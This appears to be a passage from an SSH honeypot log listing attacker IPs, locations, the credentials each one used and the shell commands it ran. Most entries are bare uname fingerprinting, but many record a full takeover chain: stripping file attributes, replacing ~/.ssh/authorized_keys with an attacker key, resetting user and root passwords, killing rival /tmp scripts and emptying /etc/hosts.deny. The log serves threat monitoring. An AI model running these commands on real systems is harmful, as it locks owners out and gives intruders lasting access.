2026-05-21 15:59 EDT Β· as lucas/lucas
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "lucas\nCD4cGFHyqgEP\nCD4cGFHyqgEP"|passwd|bash
$ Enter new UNIX password:
$ echo "lucas\nCD4cGFHyqgEP\nCD4cGFHyqgEP\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 tiger_root_16 (164.52.212.100) β€” Noida, India Β· 2 sessions Β· 2 cmds
2026-05-21 07:59 EDT Β· as root/blackcat, root/swissmp@1990
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 wok_root_22 (111.26.6.111) β€” Jilin, China Β· 1 session Β· 1 cmd
2026-05-21 15:26 EDT Β· as root/nPSpP4PBW0
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 shadow_root_73 (200.32.52.150) β€” El Palomar, Argentina Β· 4 sessions Β· 4 cmds
2026-05-06 14:00 EDT Β· as root/Swissmp2025, root/blackcat
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ uname -a Γ—4 // OS/kernel identification
🎭 phantom_root_80 (187.191.48.4) β€” Tijuana, Mexico Β· 2 sessions Β· 2 cmds
2026-05-21 07:44 EDT Β· as root/blackcat, root/swissmp123##
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 rogue_root_87 (194.233.68.72) β€” Singapore, Singapore Β· 1 session Β· 20 cmds
2026-05-21 14:50 EDT Β· as sakura/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nG279mEOxLjaz\nG279mEOxLjaz"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nG279mEOxLjaz\nG279mEOxLjaz\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 yankee_root_36 (73.170.63.58) β€” San Francisco, United States Β· 1 session Β· 19 cmds
2026-05-21 14:44 EDT Β· as root/123456qq
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:51huTUq0aLvM"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 tiger_root_17 (182.70.118.145) β€” Mumbai, India Β· 2 sessions Β· 2 cmds
2026-05-06 21:51 EDT Β· as root/blackcat, ubuntu/@Cryptolendify@2024
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 panda_root_28 (171.42.224.244) β€” Shizishan, China Β· 1 session Β· 1 cmd
2026-05-21 14:27 EDT Β· as root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 specter_root_81 (59.120.20.133) β€” New Taipei City, Taiwan Β· 4 sessions Β· 4 cmds
2026-05-06 08:50 EDT Β· as root/blackcat, root/mail_321
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ uname -a Γ—4 // OS/kernel identification
🎭 phantom_root_81 (14.225.7.70) β€” Hanoi, Vietnam Β· 1 session Β· 1 cmd
2026-05-21 14:16 EDT Β· as root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 silk_root_20 (120.92.10.155) β€” Beijing, China Β· 1 session Β· 1 cmd
2026-05-21 13:53 EDT Β· as root/nPSpP4PBW0
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 specter_root_82 (103.16.117.60) β€” Malang, Indonesia Β· 2 sessions Β· 2 cmds
2026-05-21 04:21 EDT Β· as root/Swissmp@2024$$, root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 rogue_root_88 (103.186.101.237) β€” QuαΊ­n Mα»™t, Vietnam Β· 1 session Β· 20 cmds
2026-05-21 13:16 EDT Β· as lucio/lucio
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "lucio\nlWVgWBN87xRG\nlWVgWBN87xRG"|passwd|bash
$ Enter new UNIX password:
$ echo "lucio\nlWVgWBN87xRG\nlWVgWBN87xRG\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dragon_root_23 (171.43.74.186) β€” Shizishan, China Β· 1 session Β· 1 cmd
2026-05-21 13:08 EDT Β· as root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 dragon_root_3 (183.6.72.120) β€” Guangzhou, China Β· 3 sessions Β· 3 cmds
2026-05-06 07:13 EDT Β· as root/blackcat, root/cryptolendify22019
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 cipher_root_25 (180.240.181.38) β€” Singapore, Singapore Β· 2 sessions Β· 2 cmds
2026-05-21 04:09 EDT Β· as root/@Swissmp@2024, root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 rogue_root_89 (172.104.52.204) β€” Singapore, Singapore Β· 1 session Β· 1 cmd
2026-05-21 12:55 EDT Β· as root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 phantom_root_82 (220.247.224.226) β€” Meegoda, Sri Lanka Β· 2 sessions Β· 40 cmds
2026-05-21 12:24 EDT Β· as shen/shen, socks/socks
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "socks\n46TNceXoVbnu\n46TNceXoVbnu"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "socks\n46TNceXoVbnu\n46TNceXoVbnu\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "shen\n3vWaIqyJHD8q\n3vWaIqyJHD8q"|passwd|bash
$ echo "shen\n3vWaIqyJHD8q\n3vWaIqyJHD8q\n"|passwd
🎭 shadow_root_74 (152.32.239.90) β€” Hong Kong, Hong Kong Β· 3 sessions Β· 58 cmds
2026-05-21 12:13 EDT Β· as root/123@Test, root/password01!, socks/socks
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:y5GGxEaVp6ty"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "socks\nj3L5RgcbpGkd\nj3L5RgcbpGkd"|passwd|bash
$ Enter new UNIX password:
$ echo "socks\nj3L5RgcbpGkd\nj3L5RgcbpGkd\n"|passwd
$ echo "root:RV2uvfu4K4nk"|chpasswd|bash
🎭 kimchi_root (175.126.37.156) β€” Mapo-gu, South Korea Β· 4 sessions Β· 4 cmds
2026-05-06 08:10 EDT Β· as root/Cryptolendify.2016, root/blackcat
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ uname -a Γ—4 // OS/kernel identification
🎭 k-pop_root_4 (183.111.166.18) β€” Seongnam-si, South Korea Β· 4 sessions Β· 4 cmds
2026-05-06 10:01 EDT Β· as root/Mailaf321, root/blackcat
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ uname -a Γ—4 // OS/kernel identification
🎭 ghost_root_92 (103.105.56.105) β€” Sembung, Indonesia Β· 1 session Β· 1 cmd
2026-05-21 11:56 EDT Β· as root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 lantern_root_29 (183.56.198.150) β€” Guangzhou, China Β· 1 session Β· 1 cmd
2026-05-21 11:36 EDT Β· as root/5nWt3P-fF4WosQm5O
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 phantom_root_83 (38.123.67.244) β€” Tlaquepaque, Mexico Β· 3 sessions Β· 3 cmds
2026-05-06 10:03 EDT Β· as root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 cipher_root_70 (190.142.97.50) β€” Puerto Ordaz and San Felix, Venezuela Β· 4 sessions Β· 4 cmds
2026-05-06 10:35 EDT Β· as root/blackcat, root/cryptolendify!2026!
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ uname -a Γ—4 // OS/kernel identification
🎭 pretzel_root_16 (43.158.91.178) β€” Frankfurt am Main, Germany Β· 2 sessions Β· 2 cmds
2026-05-21 03:37 EDT Β· as root/Swissmp.2024#, root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 specter_8 (150.95.81.194) β€” Bangkok, Thailand Β· 1 session Β· 1 cmd
2026-05-21 11:05 EDT Β· as jimster/Passw0rd2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 bibimbap_root (222.99.48.59) β€” Seongnam-si, South Korea Β· 4 sessions Β· 4 cmds
2026-05-06 08:13 EDT Β· as root/Mail2025, root/blackcat
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ uname -a Γ—4 // OS/kernel identification
🎭 stein_root_22 (152.53.149.25) β€” Nuremberg, Germany Β· 1 session Β· 1 cmd
2026-05-21 10:28 EDT Β· as jimster/Jimster.2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 sensei_root_4 (144.48.8.10) β€” Taitō City, Japan Β· 3 sessions Β· 60 cmds
2026-05-21 09:45 EDT Β· as bart/bart, johnny/123456, tom/123456789
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "123456789\novtOHJ4HKHXk\novtOHJ4HKHXk"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "123456789\novtOHJ4HKHXk\novtOHJ4HKHXk\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "bart\n9RXjEYG14NdM\n9RXjEYG14NdM"|passwd|bash
$ echo "bart\n9RXjEYG14NdM\n9RXjEYG14NdM\n"|passwd
$ echo -e "123456\nPUDuNbjvVB2t\nPUDuNbjvVB2t"|passwd|bash
$ echo "123456\nPUDuNbjvVB2t\nPUDuNbjvVB2t\n"|passwd
🎭 lantern_root_30 (106.12.241.195) β€” Wuhan, China Β· 1 session Β· 20 cmds
2026-05-21 10:13 EDT Β· as socks/socks
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "socks\nNpO6HsVdqAuN\nNpO6HsVdqAuN"|passwd|bash
$ Enter new UNIX password:
$ echo "socks\nNpO6HsVdqAuN\nNpO6HsVdqAuN\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_84 (191.97.12.90) β€” Otanche, Colombia Β· 2 sessions Β· 39 cmds
2026-05-21 09:33 EDT Β· as root/shujuku, socks/socks
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:l4fIFw1WIYaQ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "socks\nhzPP1mdvnEWP\nhzPP1mdvnEWP"|passwd|bash
$ Enter new UNIX password:
$ echo "socks\nhzPP1mdvnEWP\nhzPP1mdvnEWP\n"|passwd
🎭 wraith_13 (83.168.95.243) β€” Warsaw, Poland Β· 1 session Β· 20 cmds
2026-05-21 09:38 EDT Β· as tom/123456789
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456789\niQ7VandRy9sN\niQ7VandRy9sN"|passwd|bash
$ Enter new UNIX password:
$ echo "123456789\niQ7VandRy9sN\niQ7VandRy9sN\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_13 (154.221.28.214) β€” Chai Wan, Hong Kong Β· 1 session Β· 20 cmds
2026-05-21 09:38 EDT Β· as bart/bart
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "bart\nIkWcaKcTHU5G\nIkWcaKcTHU5G"|passwd|bash
$ Enter new UNIX password:
$ echo "bart\nIkWcaKcTHU5G\nIkWcaKcTHU5G\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
